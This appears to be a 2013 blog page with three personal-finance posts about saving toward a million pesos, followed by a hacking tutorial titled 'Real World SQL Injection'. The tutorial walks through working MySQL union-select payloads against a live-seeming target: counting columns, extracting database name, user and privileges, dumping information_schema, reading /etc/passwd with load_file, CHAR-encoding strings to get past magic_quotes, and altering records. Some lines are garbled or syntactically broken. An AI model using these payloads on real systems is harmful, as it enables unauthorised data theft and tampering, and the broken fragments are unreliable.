Wednesday, February 20, 2013

Why I Want To Be a Millionaire (and you might too)

This may sound weird but the truth is I never placed money as a main priority in my entire life…ever. But this does not mean that I spend it like there is no tomorrow. Saving up for the "rainy" day has always been bestowed to me by my parents ever since I was a child so much that it almost became second nature to me. From piggy banks to bank accounts, having that extra firepower when life throws almost everything at you at the same time does help me sleep well at night which is really, really priceless.

I always believed somehow that money would eventually come along as long as you exceed in whatever thing you do. Well in reality, this is partially true but may not exactly guarantee one of being a millionaire in the very near future. What I learned is that you have to make money making/saving a priority at least for the next couple of years until you reach that goal of having that label on top of your head. I know this does not sound right but it worked in my case and hopefully for you also.

If I could list all of them down, the following are probably my best reasons:

1.      Peace of mind knowing my aging mother will have some funds for her hospital bills once her health starts to eventually deteriorate in the very near future. 

2.      Financial freedom (aka peace of mind, at least for now).

3.      A clear mind that I could use my upcoming income from my day job as security guy to finance small projects that has been bugging me on top of my head for quite some time now.

4.      Lastly, I want to prove to all future cyber criminals out there that you can earn a decent living without resulting to a life of crime if you just get rid of that "get rich quick" attitude. Always keep in mind that Rome was not built in a day, so if you have patience to learn the latest security exploits, you most likely also have the patience to be a millionaire!

Sunday, February 17, 2013

The Value of Enjoying Your Job and Saving Money

I have been somewhat labelled in our industry as a "hopper" or someone who just does not stay very long at a particular job or company and finds a new one as soon as something seemingly better comes along. As they say, it is human nature to have that “the grass is always greener on the other side of the hill” mentality when no longer content with your present state. While doing this has provided me lots of hands-on work experience in the I.T. industry, it does not deny the fact that I was also escaping the realities of the corporate world whenever I was no longer happy with higher management decisions. Office politics, internal squabbling, etc. will always be there in whatever company I moved to and it just hit me one day that finding the answer deep inside is the only way to solve my personal career issues. Had I realized this early on, then most likely I would have be a lot more financially stable already as I am now. Ah regrets, regrets but that is all in the past now as what matter is what lies ahead and trying to learn as much as possible from past experiences will keep you from repeating it in the near future and thus save you extra time/money . 

Understanding the nature of your work environment can do wonders for your savings, as it simply decreases your stress by a lot of margins such that your spending instincts won't be as much once payday arrives. While we need occasional instant gratifications every now and then, keeping it down to a minimal level as a habit can do wonders towards that goal of millionaire status that you want. Always remember, an item's price tag does not determine its overall value to you once you bought it so keep that in mind.

Wednesday, February 13, 2013

Do You Really Want To Be A Millionaire?

When asked with this seemingly simple question, most people would obviously answer an overwhelming "yes" but for those few people who really know the true meaning and implications of being one might answer in a less enthusiastic manner. Especially if you are like me who have to bend over backwards each passing day just to save up each hard-earned peso after being chopped away with internal revenues’ 30% tax deduction. So how does one become one? I am not a financial "expert" in anyway but I am just sharing whatever worked for me and continues to do so. Be aware that the path is no easy one so make sure you answer to the previous question is a loud "yes at all legal means!" or something like that :)

One more thing to keep in mind also is that there is a big difference between being rich and being a millionaire especially depending on the currency of the country where you are at now. I’m from the Philippines and so our currency is Peso and 1 million pesos is equal to just around 25,000 US dollars. :)

So what is the best way to start? How about self assessment? How much have you saved up until now and how long did that take you? If your target year is within the next 5 years, then you better earn at least 20% of your target this year or at least somewhere near that. Failing to do so might result in losing your momentum in the following years since the target amount will become unrealistic to you by then.

So start saving your monthly salary from your day job and get as close to that target 20% this year!

Friday, January 11, 2013

Real World SQL Injection

Exploiting Web 2.0 , Real World SQL INJECTION

0x000 - NULL
0x001 - Introduction
0x010 - Global Exploiting
0x011 - Exploiting The Bug
0x101 - Conclusion
0x110 - Help full links


0x001 - Introduction :

SQL Injection is a technique allow you to exploit

a web vulnerability to extract content of the database

and show it for the injector thanks to an error while the

request ....


0x010 - Global Exploiting :

Exploiting The SQL Injection Vulnerability

To Exploit This Vulnerability You Got to have the following

conditions :

1- Null the query

2- Get The Number of columns

-> To null the query its enough to add something that does not

exist in the database

-> To know the number of columns in MySQL you can

use the next command in the query : '+order+by+x--

x is the number of columns you try to guess :

=> if the page shows normal with no errors this means that

the number you entered is < than real number of columns

=> if the page show and error this means that

the number you entered is > than real number of columns

now you are wondering how to know the real number of columns

i'll tell you , its the number right before 1st error !

Note : Don't forget the comment :

( -- or /* or # or a null byte )

i hope its pretty clear

so build the query like this

=> ' union select 1,2,3--

1,2,3 -> number of columns

in our example the number of columns is 19 :

'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18--

xx - now lets get basic info about this database

=> DataBase Name

-> you can get the version of the db with 'database()'

' union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17 ,18,19--

The database is called "fluff2"

=> DataBase Version

-> you can get the version of the db with 'version()'

' union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17, 18,19--

The database Version is "5"

=> DataBase UserName

-> you can get the version of the db with 'user()'

' union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18, 19--

The database username is "muu"

=> DataBase Location

-> you can get the version of the db with '@@datadir'

' union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17, 18,19--

The database is located in "/var/lib/mysql/"

xxx - Get your privileges !

Let's Try any priv's (select,update,file etc...)

' union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,1 7,18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17, 18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,1 7,18,19 from mysql.user--

it seems that nothing is allowed !

well , since our user is muu lets try to see our priv's while our user = muu

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,1 7,18,19 from mysql.user where user=CHAR(109, 117, 117)--

we can see we got full privileges now :P

0x011 - Exploiting The Bug :

let's try now to get the database content and use it !

=> uploading a file !

to upload any file magic_quotes got to be set 'OFF'

-> what the fuck is magic_quotes ?

Magic_Quotes is a feature in php Made to help coders

and developers to avoid falling in SQL injections vulnerabilities

and its going to be removed in PHP6 !

Well , in Our FaceBook Magic_Quotes Are set 'ON'

we cannot use into outfile to upload a File .!

=> Getting DB content :

to read content of a specific column , you must use the following

' union select 1,2,3,4,5,6,7,column,9,10,11,12,13,14,15,16,17,18, 19 from table--

column -> its your wanted column to read

table -> its the table where the wanted column located

Now you wonder , You don't know column names or table names ,

how to do ?

since its V5 The database it got to have information_schema inside

so let's exploit information_schema :

-> Get Tables :

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema, 0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--

Like you See It's showing the name of the table | database

but only one table appears ! what to do to show to rest ?

change concat into group_concat ; the xplt like this :

' union select 1,2,3,4,5,6,7,group_concat(table_name,0x7c,table_s chema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--

well its showing some more

but this is not all

lets try something different !

add after our current exploit LIMIT 1 OFFSET 44--

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema, 0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44--

and Change the '44' to another number and it will show another table

Now you wonder how to get table columns ?!

Alright , you can get table columns from information_schema.columns like the following

from+information_schema.columns+where+table_name=" table_name"

so in our exploit it will became like this :

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 FROM information_schema.columns where table_name='info'--

since Magic_Quotes are set to 'ON' we must convert table name to ASCII

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 FROM information_schema.columns where table_name=CHAR(105, 110, 102, 111)--

Bingo ! this is one column

to show the others use 'limit 1 offset'

You can see content of any column =)

For Now lets try to look for specific table or specific column !

you can get it using

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 from information_schema.columns where column_name like time--

Note : time is the column wanted to look for

and dont forget to change the column to ASCII because magic_quotes on

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--

To see other infos of the column concatenate 'column_name' with table_schema and table_name

' union select 1,2,3,4,5,6,7,concat(column_name,0x7c,table_schema ,0x7c,table_name),9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--

update fluff2 set time=alphanix where

Bingo ! You can see column , db , table , and look for any column ,

pretty easy ? isn't

=> Reading Any File content :

since we have file loading privileges , we can load any file

in the server (must have right permissions) and show it !

' union select 1,2,3,4,5,6,7,load_file(/etc/passwd),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=muu--

and convert to ascii

' union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--

here we loaded '/etc/passwd' file , i would like to

get the shadow but i dont have root privileges

=> Updating the database :

since we got update privilege we can change value

of any field in the db !

update query is like the following :

' update table_name set column_name='new value' where column_name='value' where user=muu

never forget to convert to ascii xD


0x101 - Conclusion :

SQL injections are vulnerable in 60% of scripts , and its really important

to learn how to protect our selves from it to make more secure scripts

0x110 - Additional Useful Link :
Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security